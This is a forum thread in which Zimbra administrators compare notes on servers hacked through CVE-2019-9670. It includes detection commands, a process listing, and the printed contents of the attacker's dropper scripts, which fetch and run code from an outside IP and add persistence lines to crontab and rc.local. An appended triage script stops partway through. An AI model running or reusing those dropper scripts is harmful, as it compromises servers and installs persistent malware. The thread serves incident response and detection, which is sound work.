CVE-2019-9670 being actively exploited (Hacked Server)

lfasci
Advanced member
Posts: 145
Joined: Mon Dec 09, 2013 2:38 am

Re: CVE-2019-9670 being actively exploited

Post by lfasci »

I found jsp files also in the folder /opt/zimbra/jetty/webapps/zimbra/img/.

I think that jsp files can be found in every folder that can be accessed from the internet.
A very dangerous file is ZimbraApps.jsp, which is http://freshmeat.sourceforge.net/projects/jspbrowser
and allows browsing almost the entire filesystem.

You can also search for recent files using
find /opt/zimbra/jetty/ -name "*.jsp" -mtime -15 -ls

In general you can look at .jsp and .sh files to search the zimbra (and maybe also system) folders where scripts or jsp files were downloaded.
You can grep for calls in the /opt/zimbra/log/access_log.2019* files to find the commands issued.

On compromised systems, with a lot of attention, a good idea is to use zmldappasswd to change the ldap passwords, because they are stored in clear text in /opt/zimbra/conf.


Hope that helps
yeeP6rai
Posts: 41
Joined: Mon Feb 12, 2018 10:16 am

Re: CVE-2019-9670 being actively exploited

Post by yeeP6rai »

I found it on my server. And yes, it has the /tmp/zmcat binary file and the /tmp/l.sh and /tmp/s.sh shell files (for their content see below).
Zimbra version: 8.7.11_GA_3706


ps -aefH
root     18242     1  0 мар23 ?     00:00:00   /opt/zimbra/libexec/zmmailboxdmgr start -Dfile.encoding=UTF-8 -server -Dhttps.protocols=TLSv1,TLSv1
zimbra   18243 18242 13 мар23 ?     2-03:28:38     /opt/zimbra/common/bin/java -Dfile.encoding=UTF-8 -server -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1
zimbra   15461 18243  0 апр04 ?     00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   15490 15461  0 апр04 ?     00:00:00         sh /tmp/s.sh
zimbra   15527 15490  0 апр04 ?     00:00:00           bash /tmp/l.sh
zimbra    9426 15527  0 апр04 ?     00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   15465 18243  0 апр04 ?     00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   15501 15465  0 апр04 ?     00:00:00         sh /tmp/s.sh
zimbra   15551 15501  0 апр04 ?     00:00:00           bash /tmp/l.sh
zimbra    9405 15551  0 апр04 ?     00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   15469 18243  0 апр04 ?     00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   15497 15469  0 апр04 ?     00:00:00         sh /tmp/s.sh
zimbra   15627 15497  0 апр04 ?     00:00:00           bash /tmp/l.sh
zimbra    9450 15627  0 апр04 ?     00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   15472 18243  0 апр04 ?     00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   15508 15472  0 апр04 ?     00:00:00         sh /tmp/s.sh
zimbra   15629 15508  0 апр04 ?     00:00:00           bash /tmp/l.sh
zimbra   15481 18243  0 апр04 ?     00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   15590 15481  0 апр04 ?     00:00:00         sh /tmp/s.sh
zimbra   15600 15590  0 апр04 ?     00:00:00           bash /tmp/l.sh
zimbra    9411 15600  0 апр04 ?     00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   15485 18243  0 апр04 ?     00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   15691 15485  0 апр04 ?     00:00:00         sh /tmp/s.sh
zimbra   15771 15691  0 апр04 ?     00:00:00           bash /tmp/l.sh
zimbra    9496 15771  0 апр04 ?     00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   15584 18243  0 апр04 ?     00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   15685 15584  0 апр04 ?     00:00:00         sh /tmp/s.sh
zimbra   15755 15685  0 апр04 ?     00:00:00           bash /tmp/l.sh
zimbra    9486 15755  0 апр04 ?     00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   15585 18243  0 апр04 ?     00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   15676 15585  0 апр04 ?     00:00:00         sh /tmp/s.sh
zimbra   15710 15676  0 апр04 ?     00:00:00           bash /tmp/l.sh
zimbra   28882 18243  0 17:14 ?        00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   28915 28882  0 17:14 ?        00:00:00         sh /tmp/s.sh
zimbra   29110 28915  0 17:14 ?        00:00:00           bash /tmp/l.sh
zimbra   16398 29110  0 17:33 ?        00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   28885 18243  0 17:14 ?        00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   28924 28885  0 17:14 ?        00:00:00         sh /tmp/s.sh
zimbra   29074 28924  0 17:14 ?        00:00:00           bash /tmp/l.sh
zimbra   16428 29074  0 17:33 ?        00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   28889 18243  0 17:14 ?        00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   29065 28889  0 17:14 ?        00:00:00         sh /tmp/s.sh
zimbra   29086 29065  0 17:14 ?        00:00:00           bash /tmp/l.sh
zimbra   16509 29086  0 17:33 ?        00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   28895 18243  0 17:14 ?        00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   28935 28895  0 17:14 ?        00:00:00         sh /tmp/s.sh
zimbra   28961 28935  0 17:14 ?        00:00:00           bash /tmp/l.sh
zimbra   28900 18243  0 17:14 ?        00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   28944 28900  0 17:14 ?        00:00:00         sh /tmp/s.sh
zimbra   28978 28944  0 17:14 ?        00:00:00           bash /tmp/l.sh
zimbra   28906 18243  0 17:14 ?        00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   28952 28906  0 17:14 ?        00:00:00         sh /tmp/s.sh
zimbra   29011 28952  0 17:14 ?        00:00:00           bash /tmp/l.sh
zimbra   16494 29011  0 17:33 ?        00:00:00             sed -i s/exit 0//g /etc/rc.local
zimbra   28910 18243  0 17:14 ?        00:00:00       /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra   29150 28910  0 17:14 ?        00:00:00         sh /tmp/s.sh
zimbra   29159 29150  0 17:14 ?        00:00:00           bash /tmp/l.sh
zimbra   16451 29159  0 17:33 ?        00:00:00             sed -i s/bash /tmp/lower.sh//g /etc/rc.local
zimbra   18523     1  0 мар23 ?     00:08:18   /opt/zimbra/common/bin/memcached -d -P /opt/zimbra/log/memcached.pid -l 127.0.0.1 -p 11211
zimbra   18542     1  0 мар23 ?     00:00:00   nginx: master process /opt/zimbra/common/sbin/nginx -c /opt/zimbra/conf/nginx.conf
zimbra   18543 18542  0 мар23 ?     01:43:29     nginx: worker process
zimbra   18544 18542  0 мар23 ?     01:43:27     nginx: worker process
zimbra   18545 18542  0 мар23 ?     01:42:28     nginx: worker process
zimbra   18546 18542  0 мар23 ?     01:46:26     nginx: worker process
zimbra   19102     1  1 мар23 ?     04:38:13   /opt/zimbra/common/sbin/clamd --config-file=/opt/zimbra/conf/clamd.conf
zimbra   19118     1  0 мар23 ?     00:00:54   /opt/zimbra/common/bin/freshclam --config-file=/opt/zimbra/conf/freshclam.conf --quiet --daemon --c
zimbra   19122     1  0 мар23 ?     00:00:00   /opt/zimbra/common/sbin/opendkim -x /opt/zimbra/conf/opendkim.conf -u zimbra
zimbra   19124 19122  0 мар23 ?     00:05:30     /opt/zimbra/common/sbin/opendkim -x /opt/zimbra/conf/opendkim.conf -u zimbra
zimbra   19165     1  0 мар23 ?     00:01:43   /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra   19166 19165  0 мар23 ?     00:00:00     /opt/zimbra/common/bin/rotatelogs /opt/zimbra/log/httpd_error.log.%Y-%m-%d 86400
zimbra   19167 19165  0 мар23 ?     00:00:00     /opt/zimbra/common/bin/rotatelogs /opt/zimbra/log/httpd_access.log.%Y-%m-%d 86400
zimbra   19169 19165  0 мар23 ?     00:08:11     /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra   19171 19165  0 мар23 ?     00:08:16     /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra   19172 19165  0 мар23 ?     00:08:05     /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra   11443 19165  0 мар24 ?     00:07:27     /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra   19338     1  0 мар23 ?     02:09:19   /opt/zimbra/common/lib/jvm/java/bin/java -XX:ErrorFile=/opt/zimbra/log -client -Xmx256m -Dhttps.pro
zimbra   19350     1  0 мар23 ?     00:00:32   /opt/zimbra/common/sbin/saslauthd -r -a zimbra
zimbra   19368 19350  0 мар23 ?     00:00:31     /opt/zimbra/common/sbin/saslauthd -r -a zimbra
zimbra   19369 19350  0 мар23 ?     00:00:31     /opt/zimbra/common/sbin/saslauthd -r -a zimbra
zimbra   19370 19350  0 мар23 ?     00:00:31     /opt/zimbra/common/sbin/saslauthd -r -a zimbra
zimbra   19371 19350  0 мар23 ?     00:00:32     /opt/zimbra/common/sbin/saslauthd -r -a zimbra
root     19516     1  0 мар23 ?     00:07:47   /opt/zimbra/common/libexec/master -w
postfix  19518 19516  0 мар23 ?     00:01:41     qmgr -l -t unix -u
postfix  21295 19516  0 мар23 ?     00:00:38     tlsmgr -l -t unix -u
postfix  25125 19516  0 мар27 ?     00:07:43     postscreen -l -n smtp -t inet -u
postfix  25128 19516  0 мар27 ?     00:03:07     anvil -l -t unix -u
postfix  31671 19516  0 22:06 ?        00:00:00     pickup -l -t unix -u
postfix   9701 19516  0 22:18 ?        00:00:00     showq -t unix -u
postfix   1256 19516  0 22:44 ?        00:00:00     proxymap -t unix -u
postfix   8078 19516  0 22:53 ?        00:00:00     trivial-rewrite -n rewrite -t unix -u
postfix   8079 19516  0 22:53 ?        00:00:00     cleanup -z -t unix -u
postfix   8080 19516  0 22:53 ?        00:00:00     smtp -n smtp-amavis -t unix -u -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -
postfix  11097 19516  0 22:56 ?        00:00:00     trivial-rewrite -n rewrite -t unix -u
postfix  11098 19516  0 22:56 ?        00:00:00     proxymap -t unix -u
postfix  11100 19516  0 22:56 ?        00:00:00     proxymap -t unix -u
postfix  11102 19516  0 22:56 ?        00:00:00     cleanup -z -t unix -u
postfix  11103 19516  0 22:56 ?        00:00:00     smtp -n smtp-amavis -t unix -u -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -
postfix  11108 19516  0 22:56 ?        00:00:00     smtpd -n [127.0.0.1]:10025 -t inet -u -o content_filter= -o local_recipient_maps= -o virtual_mail
postfix  11110 19516  0 22:56 ?        00:00:00     smtpd -n [127.0.0.1]:10025 -t inet -u -o content_filter= -o local_recipient_maps= -o virtual_mail
postfix  11112 19516  0 22:56 ?        00:00:00     lmtp -t unix -u
postfix  12948 19516  1 22:58 ?        00:00:00     smtpd -t pass -u -o stress= -o smtpd_tls_security_level=may -o content_filter=scan:[127.0.0.1]:10
postfix  12949 19516  1 22:58 ?        00:00:00     smtpd -t pass -u -o stress= -o smtpd_tls_security_level=may -o content_filter=scan:[127.0.0.1]:10
zimbra   19580     1  0 мар23 ?     00:08:30   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-proc
zimbra   19582     1  0 мар23 ?     00:01:23   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-cpu
zimbra   19584     1  0 мар23 ?     00:01:15   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-vm
zimbra   21233 19584  0 мар23 ?     00:00:15     /usr/bin/vmstat -n -S K 30
zimbra   19586     1  0 мар23 ?     00:00:37   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-io -x
zimbra   21236 19586  0 мар23 ?     00:00:27     /usr/bin/iostat -d -k -x 30
zimbra   19588     1  0 мар23 ?     00:00:06   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-df
zimbra   19590     1  0 мар23 ?     00:00:36   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-io
zimbra   21235 19590  0 мар23 ?     00:00:25     /usr/bin/iostat -d -k 30
zimbra   19592     1  0 мар23 ?     00:00:00   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-fd
root     20459 19592  0 мар23 ?     00:00:00     sudo /opt/zimbra/libexec/zmstat-fd
root     20460 20459  0 мар23 ?     00:03:04       /usr/bin/perl -w /opt/zimbra/libexec/zmstat-fd
zimbra   19596     1  0 мар23 ?     00:39:27   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-allprocs
zimbra   19617     1  0 мар23 ?     00:04:07   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-mysql
zimbra   19628     1  0 мар23 ?     00:01:11   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-mtaqueue
zimbra   19659     1  0 мар23 ?     00:14:17   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-nginx
zimbra   19662     1  0 мар23 ?     00:14:05   /usr/bin/perl -w /opt/zimbra/libexec/zmstat-ldap
zimbra   29900     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   29919 29900  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   17860 29919  0 апр02 ?     00:00:00       sed -i s/bash /tmp/lower.sh//g /etc/rc.local
zimbra   29913     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   29937 29913  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   29965     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   29975 29965  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   30013     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   30022 30013  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   30051     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   30060 30051  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   30090     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   30099 30090  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   30127     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   30136 30127  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   26749     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   26772 26749  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   26762     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   26774 26762  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   26843     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   26852 26843  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   14204 26852  0 апр02 ?     00:00:00       sed -i s/exit 0//g /etc/rc.local
zimbra   26889     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   26910 26889  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   26901     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   26944 26901  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   26917     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   26969 26917  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   27001     1  0 апр02 ?     00:00:00   sh /tmp/s.sh
zimbra   27011 27001  0 апр02 ?     00:00:00     bash /tmp/l.sh
zimbra   25087     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   25100 25087  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra   25228     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   25269 25228  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra   25297     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   25330 25297  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra   25357     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   25368 25357  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra   25425     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   25450 25425  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra   25441     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   25474 25441  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra    8358 25474  0 апр03 ?     00:00:00       sed -i s/bash /tmp/lower.sh//g /etc/rc.local
zimbra   23473     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   23498 23473  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra   23481     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   23522 23481  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra   23485     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   23531 23485  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra    1209 23531  0 апр03 ?     00:00:00       sed -i s/exit 0//g /etc/rc.local
zimbra   23614     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   23642 23614  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra    1361 23642  0 апр03 ?     00:00:00       sed -i s/bash /tmp/lower.sh//g /etc/rc.local
zimbra   23624     1  0 апр03 ?     00:00:00   sh /tmp/s.sh
zimbra   23650 23624  0 апр03 ?     00:00:00     bash /tmp/l.sh
zimbra    8807     1  0 00:45 ?        00:00:01   /usr/bin/perl -T /opt/zimbra/common/sbin/amavis-mc
zimbra    8811  8807  0 00:45 ?        00:03:10     /usr/bin/perl -T /opt/zimbra/common/sbin/amavis-services msg-forwarder
zimbra    8812  8807  0 00:45 ?        00:00:37     /usr/bin/perl -T /opt/zimbra/common/sbin/amavis-services childproc-minder
zimbra    8813  8807  0 00:45 ?        00:00:33     /usr/bin/perl -T /opt/zimbra/common/sbin/amavis-services snmp-responder
zimbra    8844     1  0 00:45 ?        00:00:03   /opt/zimbra/common/sbin/amavisd (master)
zimbra   18833  8844  0 21:15 ?        00:00:07     /opt/zimbra/common/sbin/amavisd (ch12-avail)
zimbra   20933  8844  0 21:17 ?        00:00:11     /opt/zimbra/common/sbin/amavisd (ch19-avail)
zimbra   26051  8844  0 21:23 ?        00:00:10     /opt/zimbra/common/sbin/amavisd (ch18-avail)
zimbra   31482  8844  0 21:29 ?        00:00:05     /opt/zimbra/common/sbin/amavisd (ch12-avail)
zimbra    5223  8844  0 21:36 ?        00:00:10     /opt/zimbra/common/sbin/amavisd (ch18-avail)
zimbra   11989  8844  0 21:44 ?        00:00:07     /opt/zimbra/common/sbin/amavisd (ch16-avail)
zimbra   29403  8844  0 22:04 ?        00:00:03     /opt/zimbra/common/sbin/amavisd (ch9-avail)
zimbra    8966  8844  0 22:17 ?        00:00:04     /opt/zimbra/common/sbin/amavisd (ch8-avail)
zimbra   13540  8844  0 22:22 ?        00:00:04     /opt/zimbra/common/sbin/amavisd (ch8-avail)
zimbra    5857  8844  0 22:50 ?        00:00:00     /opt/zimbra/common/sbin/amavisd (ch1-avail)
zimbra   25153     1  0 03:31 ?        00:07:24   /opt/zimbra/common/lib/jvm/java/bin/java -XX:ErrorFile=/opt/zimbra/log -client -Xmx256m -Dhttps.pro
zimbra   26572     1  0 03:31 ?        00:00:42   /opt/zimbra/common/bin/swatchdog --config-file=/opt/zimbra/conf/logswatchrc --use-cpan-file-tail --
zimbra   26573 26572  0 03:31 ?        00:01:17     /usr/bin/perl /opt/zimbra/libexec/zmlogger
zimbra   26693 26573  0 03:31 ?        00:00:00       zmlogger: zmrrdfetch: server
zimbra   26709     1  0 03:31 ?        00:00:00   /usr/bin/perl /opt/zimbra/common/bin/swatchdog --config-file=/opt/zimbra/conf/swatchrc --use-cpan-f
zimbra   26718 26709  0 03:31 ?        00:02:10     /usr/bin/perl /opt/zimbra/data/tmp/.swatchdog_script.26709
root     14997     1  0 04:30 ?        00:10:31   /usr/bin/python2 -s /usr/bin/fail2ban-server -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ba
[root@mail zimbra]#


[root@mail ~]# less /tmp/l.sh
#!/bin/bash

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/opt/zimbra/bin

function kills() {
        /bin/ps aux |grep -v zmcat | awk '{if($3>50.0) print $2}' | while read procid
        do
        kill -9 $procid
        done
}

function writecrontab() {
        xcrontab=$(cat /etc/crontab | grep "http://181.148.183.75/reports/l.sh" | grep -v grep |wc -l)
        if [ $xcrontab -eq 0 ];then
        echo "0 0 * * *   root    curl http://181.148.183.75/reports/l.sh -L > /tmp/l.sh ; wget -P /tmp/ http://181.148.183.75/reports/l.sh ; rm /tmp/l.sh.* ; bash /tmp/l.sh &" >> /etc/crontab
        else
        echo ""
        fi
}

function writerc() {
        x=$(cat /etc/rc.local | grep "http://181.148.183.75/reports/l.sh" | grep -v grep | wc -l)
        if [ $x -eq 0 ];then
                $(sed -i "s/exit 0//g" /etc/rc.local)
                $(sed -i "s/bash /tmp/lower.sh//g" /etc/rc.local)
                echo "curl http://181.148.183.75/reports/l.sh -L > /tmp/l.sh ; wget -P /tmp/ http://181.148.183.75/reports/l.sh ; rm /tmp/l.sh.* ; bash /tmp/l.sh" >> /etc/rc.local
                echo "exit 0" >> /etc/rc.local
        else
                echo ""
        fi


[root@mail ~]# less /tmp/s.sh
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/opt/zimbra/bin

/usr/bin/pkill -f "185.106.120.118"
/bin/ps aux | grep -v zmcat | awk '{if($3>50.0) print $2}' | while read procid
do
/bin/kill -9 $procid
done

whoami=$( whoami )
if [ ${whoami}x != "root"x ];then
        echo "user"
        curl  --connect-timeout 30 --max-time 30 --retry 3 http://181.148.183.75/reports/l.sh  -o /tmp/l.sh
        if [ ! -f "/tmp/l.sh" ] ;then
                wget  http://181.148.183.75/reports/l.sh -P /tmp/
                rm /tmp/l.sh.*
        fi
        chmod 777 /tmp/l.sh
        bash /tmp/l.sh
else
        curl  --connect-timeout 30 --max-time 30 --retry 3 http://181.148.183.75/reports/l.sh  -o /tmp/l.sh
        if [ ! -f "/etc/root.sh" ] ;then
                wget  http://181.148.183.75/reports/r.sh -O /etc/root.sh
                rm /etc/root.sh.*
        fi
        chmod 777 /etc/root.sh
        bash /etc/root.sh
fi
echo "over"
yeeP6rai
Posts: 41
Joined: Mon Feb 12, 2018 10:16 am

Re: CVE-2019-9670 being actively exploited

Post by yeeP6rai »

Is there a way to know about new patches (via RSS, mailing list, Zabbix web page monitor, etc.) for a specific Zimbra version?
Thanks
maxxer
Outstanding Member
Posts: 224
Joined: Fri Oct 04, 2013 2:12 am
Contact:

Re: CVE-2019-9670 being actively exploited

Post by maxxer »

yeeP6rai wrote: Is there a way to know about new patches (via RSS, mailing list, Zabbix web page monitor, etc.) for a specific Zimbra version?
rss: https://blog.zimbra.com/
yeeP6rai
Posts: 41
Joined: Mon Feb 12, 2018 10:16 am

Re: CVE-2019-9670 being actively exploited

Post by yeeP6rai »

maxxer wrote:
yeeP6rai wrote: Is there a way to know about new patches (via RSS, mailing list, Zabbix web page monitor, etc.) for a specific Zimbra version?
rss: https://blog.zimbra.com/
Thank you!
maxxer
Outstanding Member
Posts: 224
Joined: Fri Oct 04, 2013 2:12 am
Contact:

Re: CVE-2019-9670 being actively exploited

Post by maxxer »

lfasci wrote: You can also search for recent files using
find /opt/zimbra/jetty/ -name "*.jsp" -mtime -15 -ls
Other than this, users found malicious .java files.

In addition to the one above, this find should also be run:


find /opt/zimbra/jetty/ -name "*_jsp.java" -mtime -15 -ls 
maxxer
Outstanding Member
Posts: 224
Joined: Fri Oct 04, 2013 2:12 am
Contact:

Re: CVE-2019-9670 being actively exploited

Post by maxxer »

I myself also found some .class files named after the compromised .java ones.
yeeP6rai
Posts: 41
Joined: Mon Feb 12, 2018 10:16 am

Re: CVE-2019-9670 being actively exploited

Post by yeeP6rai »

maxxer wrote:
lfasci wrote: You can also search for recent files using
find /opt/zimbra/jetty/ -name "*.jsp" -mtime -15 -ls
Other than this, users found malicious .java files.

In addition to the one above, this find should also be run:


find /opt/zimbra/jetty/ -name "*_jsp.java" -mtime -15 -ls 
Yes... Thanks

[root@mail ~]# find /opt/zimbra/jetty/ -name "*_jsp.java" -mtime -15 -ls
27160940 8 -rw-r----- 1 zimbra zimbra 5699 апр 2 23:27 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/img/_3trc_jsp.java
27160948 8 -rw-r----- 1 zimbra zimbra 5699 апр 2 23:28 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/img/_59fk_jsp.java
27160941 8 -rw-r----- 1 zimbra zimbra 5698 апр 2 23:27 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/img/HMtq_jsp.java
23333748 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 11:46 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/AVj2_jsp.java
23333297 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 12:48 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/J7To_jsp.java
23331626 8 -rw-r----- 1 zimbra zimbra 5212 апр 2 23:27 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/_8rcg_jsp.java
23331318 8 -rw-r----- 1 zimbra zimbra 5211 апр 2 23:27 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/aWbc_jsp.java
23335475 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 12:57 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/B9uH_jsp.java
23331332 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 11:46 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/Yo5h_jsp.java
23331505 8 -rw-r----- 1 zimbra zimbra 4940 мар 28 11:46 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/_9gHM_jsp.java
23333290 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 12:48 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/zqnl_jsp.java
23333028 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 12:54 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/pDvJ_jsp.java
maxxer
Outstanding Member
Posts: 224
Joined: Fri Oct 04, 2013 2:12 am
Contact:

Re: CVE-2019-9670 being actively exploited

Post by maxxer »

yeeP6rai wrote: Yes... Thanks
Along with them I also found some .class files with the same basename as the .java ones.
pup_seba
Outstanding Member
Posts: 687
Joined: Sat Sep 13, 2014 2:43 am
Location: Tarragona - Spain
Contact:

Re: CVE-2019-9670 being actively exploited

Post by pup_seba »

So, based on your findings so far, we should be looking for these things:

--> Recursively under /opt/zimbra/jetty/ (so far things were found under /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/ and under /opt/zimbra/jetty/webapps/zimbra/downloads)
- Weird (randomly named) files with the ".jsp" extension
- Weird (randomly named) files ending in "_jsp.java" or "_jsp.class".

--> Under /tmp
- zmcat
- l.sh
- s.sh

--> Verify for "weird" accounts in Zimbra. At least for one of my customers, their scripts weren't able to delete those accounts once created.

--> Verify that /etc/crontab and /etc/rc.local are "clean".

The jsp files I found are for that reverse cmd thing. Are the ones you find also for that? Maybe we could also search (grep) for some part of their content, as a reinforcement for all the 'finds' being executed.

Thank you guys!
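The checklist above, together with the two find commands from lfasci and maxxer and lfasci's suggestion to grep the access logs, can be folded into one triage script. The following is an example added by the editor, not a script posted in this thread or shipped by Zimbra. It assumes nothing beyond the indicators the posters reported: the jetty directory, the three /tmp file names, the download host that l.sh writes into /etc/crontab and /etc/rc.local, and the /img/ and /downloads/ paths where the dropped .jsp files were found. Every location is a parameter, so the same functions run against a live host (root prefix "/") or against the constructed sample tree the script builds for its own demo; the sample files, crontab line and access-log lines are constructed for the demo and are not real data.

```shell
#!/bin/sh
# Triage helpers for the indicators discussed in this thread. Example added by the editor,
# not a script from the thread or from Zimbra. Every location is a parameter so the checks
# run against a real host (root prefix "/") or against a constructed tree.

# 1. JSP artifacts modified in the last N days under jetty: dropped .jsp files plus the
#    _jsp.java / _jsp.class files Jetty writes when it compiles them (default 15 days,
#    matching the find commands quoted in the thread).
find_recent_jsp_artifacts() {
    jetty_dir="$1"
    days="${2:-15}"
    find "$jetty_dir" -type f -mtime "-$days" \
        \( -name '*.jsp' -o -name '*_jsp.java' -o -name '*_jsp.class' \) -ls
}

# 2. Dropper files in the temp directory named in the ps output and scripts above.
find_tmp_droppers() {
    tmp_dir="$1"
    for name in zmcat l.sh s.sh; do
        if [ -e "$tmp_dir/$name" ]; then echo "$tmp_dir/$name"; fi
    done
}

# 3. Persistence: l.sh appends a line containing its download host to /etc/crontab and
#    /etc/rc.local, so a fixed-string grep for that host is a cheap check. The default
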